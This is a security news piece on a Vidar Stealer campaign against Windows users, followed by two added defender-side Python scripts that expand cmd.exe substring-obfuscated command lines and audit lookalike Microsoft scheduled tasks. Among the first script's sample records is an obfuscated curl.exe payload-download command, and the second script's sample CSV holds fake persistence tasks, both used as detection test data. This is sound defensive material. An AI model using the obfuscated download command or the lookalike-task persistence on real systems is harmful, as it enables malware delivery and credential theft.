A sophisticated new campaign using Vidar Stealer has emerged, specifically targeting Windows users. This campaign employs an intricate attack chain that bypasses endpoint detection systems to steal sensitive user credentials.
Vidar Stealer’s Evolution and Impact
Vidar Stealer, an infamous data-stealing malware initially seen in 2018, is known for extracting valuable information such as browser passwords and cryptocurrency wallet data. The latest campaign enhances these capabilities with advanced evasion tactics to consistently slip past Endpoint Detection and Response (EDR) tools.
The stealthy nature of this campaign has caught the attention of cybersecurity experts because of its ability to complete its malicious tasks before victims become aware of the breach.
Advanced Evasion Techniques
Genians Security Center researchers have identified the use of multi-stage delivery methods, obfuscated script execution, and exploitation of legitimate system utilities to avoid detection. The attack begins with spear-phishing emails that match the recipient’s professional context, containing ZIP files that disguise malicious Windows shortcuts as legitimate documents.
When opened, these shortcuts initiate hidden scripts that download additional payloads. The process uses environment variable-based obfuscation to prevent static analysis tools from recognizing malicious activities.
Challenges in Detection and Mitigation
The campaign’s use of environment variable-based substring expansion splits each command into fragments that are only assembled at run time, so security systems evaluate the fragments individually and miss the overall malicious intent. Additionally, the attack leverages curl.exe, a utility shipped with Windows, to download further payloads, a tactic known as Living-off-the-Land.
Persistence is maintained through scheduled tasks whose names mimic legitimate Microsoft processes, allowing the malware to run consistently. The final payload acts as a backdoor, enabling remote command execution and data exfiltration.
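The following is an added defender-side example, not code from the article or from Genians Security Center. It shows how a process-creation command line that relies on cmd.exe substring expansion (`%VAR:~start,len%`) looks to a static scanner, and how resolving the references against an environment snapshot reveals the real command, including a curl.exe download that the fragments hide. The log records, the environment values and the flag names are constructed for the example.

```python
import re
from dataclasses import dataclass, field

# cmd.exe variable reference forms: %VAR%, %VAR:~start% and %VAR:~start,len%
ENV_REF = re.compile(r"%([A-Za-z_][A-Za-z0-9_()]*)(?::~(-?\d+)(?:,(-?\d+))?)?%")
# Only the substring form is flagged; plain %VAR% is ubiquitous in benign command lines
SUBSTRING_REF = re.compile(r"%[A-Za-z_][A-Za-z0-9_()]*:~-?\d+(?:,-?\d+)?%")
DOWNLOADER = re.compile(r"(?i)\bcurl(?:\.exe)?\b")

# Constructed environment snapshot with typical Windows default values (not from a real host)
SAMPLE_ENV = {
    "COMSPEC": r"C:\Windows\system32\cmd.exe",
    "WINDIR": r"C:\Windows",
    "TEMP": r"C:\Users\alice\AppData\Local\Temp",
}


def cmd_substring(value, start, length=None):
    """Apply cmd.exe %VAR:~start,len% semantics: a negative start counts from the end,
    a negative len drops that many characters from the end, an omitted len runs to the end."""
    n = len(value)
    if start < 0:
        start = max(n + start, 0)
    if length is None:
        end = n
    elif length < 0:
        end = n + length
    else:
        end = start + length
    return value[start:max(end, start)]


def expand(cmdline, env):
    """Resolve every %VAR...% reference in a command line against an environment snapshot."""
    upper_env = {k.upper(): v for k, v in env.items()}  # cmd.exe variable names are case-insensitive

    def repl(m):
        name, start, length = m.groups()
        value = upper_env.get(name.upper())
        if value is None:
            return m.group(0)  # unknown variable: keep the literal so the analyst can see it
        if start is None:
            return value
        return cmd_substring(value, int(start), int(length) if length is not None else None)

    return ENV_REF.sub(repl, cmdline)


@dataclass
class Finding:
    parent: str
    cmdline: str
    resolved: str
    flags: list = field(default_factory=list)


def analyze(record, env=SAMPLE_ENV):
    """One process-creation record in; a Finding with the resolved command line and flags out."""
    resolved = expand(record["cmdline"], env)
    f = Finding(record["parent"], record["cmdline"], resolved)
    if SUBSTRING_REF.search(record["cmdline"]):
        f.flags.append("env-substring-expansion")  # fragments hide the intent until expanded
    if DOWNLOADER.search(resolved):
        f.flags.append("curl-download")  # Living-off-the-Land fetch, visible only after expansion
    if f.flags and record["parent"].lower() == "explorer.exe":
        f.flags.append("launched-from-explorer")  # consistent with a double-clicked shortcut
    return f


# Constructed process-creation records (parent image + command line), not real telemetry
SAMPLE_LOG = [
    {"parent": "explorer.exe", "cmdline": r'"C:\Windows\System32\cmd.exe" /c dir C:\Users\alice'},
    {"parent": "cmd.exe", "cmdline": r"cmd.exe /c echo %WINDIR%"},
    {"parent": "explorer.exe",
     "cmdline": r"%COMSPEC:~-7,3% /c curl.exe -s -o %TEMP%\upd.tmp http://example.invalid/p"},
]


def triage(records, env=SAMPLE_ENV):
    """Return only the Findings that carry at least one flag."""
    return [f for f in (analyze(r, env) for r in records) if f.flags]


if __name__ == "__main__":
    for f in triage(SAMPLE_LOG):
        print(f.flags, "|", f.cmdline, "->", f.resolved)
```

The first two records produce no flags: plain `%WINDIR%` expansion is normal, and a literal cmd.exe path is what most logs contain. Only the third record, where `%COMSPEC:~-7,3%` resolves to `cmd`, is flagged, and its resolved form shows the curl.exe download that the raw command line does not. In a real pipeline the environment snapshot would come from the endpoint's own process telemetry rather than a fixed table.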
Implications and Defensive Measures
The primary goal of this campaign is to extract credentials stored in Chromium-based browsers by decrypting key files using the Windows CryptUnprotectData API. With multiple command-and-control domains spread globally, infrastructure-based blocking is challenging.
To counter these threats, organizations should bolster behavior-based EDR capabilities, restrict execution of shortcut files in archives, and avoid storing credentials in browsers. Regular auditing of scheduled tasks is also recommended to mitigate exposure.
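As an added example of the scheduled-task audit recommended above (not code from the article or from the researchers), the script below reads a task inventory in the column layout of `schtasks /query /fo CSV /v`, reduced to the TaskName, Author and Task To Run columns, and flags tasks whose names look like Microsoft or Windows tasks but whose action runs from a user-writable location or launches a script host against one. The CSV rows, environment defaults and thresholds are constructed for the example; on a real host the CSV would be exported from schtasks and the Author column should be treated as untrusted, since it is set by whoever created the task.

```python
import csv
import io
import ntpath
import re

# Constructed excerpt in the layout of `schtasks /query /fo CSV /v`, reduced to the three
# columns this audit reads. Names and actions are sample data, not from a real host.
SAMPLE_TASKS_CSV = (
    '"TaskName","Author","Task To Run"\n'
    '"\\Microsoft\\Windows\\Defrag\\ScheduledDefrag","Microsoft Corporation",'
    '"%windir%\\system32\\defrag.exe -c -h -k -g"\n'
    '"\\Microsoft\\Windows\\Maintenance\\WindowsUpdateCheck","",'
    '"C:\\Users\\Public\\Libraries\\svchost.exe -k netsvcs"\n'
    '"\\Microsoft\\Windows\\WindowsUpdate\\Scheduled Start","Microsoft Corporation",'
    '"%windir%\\system32\\sc.exe start wuauserv"\n'
    '"\\Microsoft\\Windows\\Diagnosis\\Scheduled","Microsoft Corporation",'
    '"""%windir%\\system32\\wscript.exe"" //B %APPDATA%\\diag.js"\n'
    '"\\Backup\\NightlyBackup","CORP\\alice",'
    '"""C:\\Program Files\\Backup\\backup.exe"" /nightly"\n'
)

# Typical default values for the variables that trusted task actions use (constructed)
ENV_DEFAULTS = {
    "WINDIR": r"C:\Windows",
    "SYSTEMROOT": r"C:\Windows",
    "PROGRAMFILES": r"C:\Program Files",
    "PROGRAMFILES(X86)": r"C:\Program Files (x86)",
}
TRUSTED_PREFIXES = ("c:\\windows\\", "c:\\program files\\", "c:\\program files (x86)\\")
USER_WRITABLE = re.compile(r"(?i)(c:\\users\\|%appdata%|%localappdata%|%temp%|%tmp%|%public%)")
MS_LOOKALIKE = re.compile(r"(?i)microsoft|windows")
SCRIPT_HOSTS = {"cmd.exe", "powershell.exe", "wscript.exe", "cscript.exe"}


def expand_env(text):
    """Expand the %VAR% references in ENV_DEFAULTS; unknown ones stay literal on purpose,
    so a path such as %APPDATA% remains visible to the user-writable check."""
    return re.sub(r"%([^%]+)%", lambda m: ENV_DEFAULTS.get(m.group(1).upper(), m.group(0)), text)


def executable_of(task_to_run):
    """Return the executable part of a Task To Run value, quoted or not."""
    s = task_to_run.strip()
    if s.startswith('"'):
        end = s.find('"', 1)
        return s[1:end] if end > 0 else s[1:]
    return s.split()[0] if s else ""


def audit_task(row):
    """Reasons a single task looks like a lookalike persistence entry; empty list if none."""
    name, author, action = row["TaskName"], row["Author"], row["Task To Run"]
    reasons = []
    if not MS_LOOKALIKE.search(name):
        return reasons  # not claiming to be a Microsoft task; outside this check's scope
    exe = expand_env(executable_of(action)).lower()
    if not exe.startswith(TRUSTED_PREFIXES):
        reasons.append(f"Microsoft-named task runs a binary outside system/program dirs: {exe}")
    if ntpath.basename(exe) in SCRIPT_HOSTS and USER_WRITABLE.search(action):
        reasons.append("script host is launched with a user-writable path in its arguments")
    if not author.strip():
        reasons.append("Microsoft-named task has no Author")
    return reasons


def audit(csv_text):
    """Map each flagged task name to its list of reasons."""
    flagged = {}
    for row in csv.DictReader(io.StringIO(csv_text)):
        reasons = audit_task(row)
        if reasons:
            flagged[row["TaskName"]] = reasons
    return flagged


if __name__ == "__main__":
    for task, reasons in audit(SAMPLE_TASKS_CSV).items():
        print(task)
        for r in reasons:
            print("  -", r)
```

Two of the five sample tasks are flagged: the `WindowsUpdateCheck` task whose action lives under `C:\Users\Public`, and the `Diagnosis` task that runs wscript.exe from the system directory but points it at a script under `%APPDATA%`. The genuine Defrag and Windows Update entries pass because their actions resolve to `C:\Windows\system32`, and the backup job is skipped because its name does not imitate Microsoft. The name and path heuristics are deliberately simple; a production audit would also compare each task against a known-good baseline.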
As the cybersecurity landscape evolves, staying informed and adopting robust security measures is crucial in defending against increasingly sophisticated threats like the Vidar Stealer campaign.
